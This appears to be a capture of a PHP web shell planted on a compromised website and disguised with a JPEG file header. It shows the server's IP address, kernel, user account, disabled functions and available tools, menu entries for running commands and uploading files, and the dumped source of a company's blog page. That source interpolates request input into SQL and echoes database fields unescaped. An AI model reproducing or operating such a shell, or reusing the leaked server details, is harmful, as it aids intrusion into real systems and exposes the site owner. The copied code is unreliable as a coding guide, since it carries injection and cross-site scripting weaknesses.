����JFIF��x�x������Exif��MM�*���� ����E���J����������������(������������������
Server IP : 103.191.208.227 / Your IP : 18.117.71.102 Web Server : LiteSpeed System : Linux emphasis.herosite.pro 4.18.0-553.8.1.lve.el8.x86_64 #1 SMP Thu Jul 4 16:24:39 UTC 2024 x86_64 User : mhmsfzcs ( 1485) PHP Version : 8.1.31 Disable Function : show_source, system, shell_exec, passthru, exec MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home/mhmsfzcs/vflyorions.com/.well-known/../ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<link rel="canonical" href="https://vflyorions.com/blog"/> <meta charset="UTF-8"> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta name="description" content="Vflyorions Blogs - Stay updated with the latest news, technology, and trends in call center industry and enhance your customer support services" /> <meta name="keywords" content="BPO Service in nagpur, BPO voice and non voice, BPO voice In nagpur, BPO non voice in nagpur , BPO voice company in nagpur, BPO non-voice company in nagpur, BPO voice and non voice services, BPO outsorcing, B2B call Center" /> <!-- ======== Page title ============ --> <title>Top Tips for Blogging Success: Expert Insights | Vflyorions</title> <?php $pages = 'pages'; $page = 'blog'; include 'header.php'; ?> <div class="page-banner-wrap bg-cover" style="background-image: url('assets/img/allbanner.png')"> <div class="container"> <div class="row"> <div class="col-12 col-lg-12"> <div class="page-heading text-white"> <h1>Blog</h1> </div> <div class="breadcrumb-wrap"> <nav> <ol class="breadcrumb"> <li class="breadcrumb-item"><a href="index.php">Home</a></li> <li class="breadcrumb-item active" aria-current="page">Blog</li> </ol> </nav> </div> </div> </div> </div> </div> <section class="blog-wrapper news-wrapper section-padding"> <div class="container"> <div class="row"> <div class="col-12 col-lg-8"> <div class="blog-posts"> <?php $blogsPerPage = 3; $currentPage = isset($_GET['page']) ? $_GET['page'] : 1; $offset = ($currentPage - 1) * $blogsPerPage; // Count total number of blogs $countQuery = "SELECT COUNT(*) as total FROM blog"; $countResult = $conn->query($countQuery); $totalBlogs = $countResult->fetch_assoc()['total']; $query = "SELECT * FROM blog ORDER BY id DESC LIMIT $offset, $blogsPerPage"; $result = $conn->query($query); while ($row = $result->fetch_assoc()) { ?> <div class="single-blog-post"> <div class="post-featured-thumb bg-cover" style="background-image: url('admin/assets/blog_image/<?= $row['image']; ?>')"></div> <div class="post-content"> <h2><a href="blog-details.php?id=<?= $row['id']; ?>"><?= $row['heading']; ?></a></h2> <div class="post-meta"> <span><i class="fal fa-calendar-alt"> <?= $row['date']; ?></i></span> </div> <p><?= $row['short_desc']; ?></p> <div class="d-flex justify-content-between align-items-center mt-30"> <div class="author-info"> </div> <div class="post-link"> <a href="blog-details.php?id=<?= $row['id']; ?>"><i class="fal fa-arrow-right"></i> Read More</a> </div> </div> </div> </div> <?php } ?> </div> <div class="page-nav-wrap mt-60 text-center"> <ul> <?php // Assuming you have total number of blogs in $totalBlogs variable $totalPages = ceil($totalBlogs / $blogsPerPage); if ($currentPage > 1) { echo "<li><a href='?page=" . ($currentPage - 1) . "'><i class='fal fa-long-arrow-left'></i></a></li>"; } for ($i = 1; $i <= $totalPages; $i++) { echo "<li><a href='?page=$i'>$i</a></li>"; } if ($currentPage < $totalPages) { echo "<li><a href='?page=" . ($currentPage + 1) . "'><i class='fal fa-long-arrow-right'></i></a></li>"; } ?> </ul> </div> <!-- /.col-12 col-lg-12 --> </div> <div class="col-12 col-lg-4"> <div class="main-sidebar"> <div class="single-sidebar-widget"> <div class="wid-title"> <h3>Popular Feeds</h3> </div> <div class="popular-posts"> <?php $query="SELECT * FROM blog ORDER BY id DESC LIMIT 5"; $result= $conn->query($query); while($row=$result->fetch_assoc()) { ?> <div class="single-post-item"> <div class="thumb bg-cover" style="background-image: url('admin/assets/blog_image/<?= $row['image']; ?>')"></div> <div class="post-content"> <h5><?= $row['heading']; ?></h5> <div class="post-date"> <i class="far fa-calendar-alt"></i> <?= $row['date']; ?> </div> </div> </div> <?php } ?> </div> </div> </div> </div> </div> </div> </section> <?php include 'footer.php'; ?>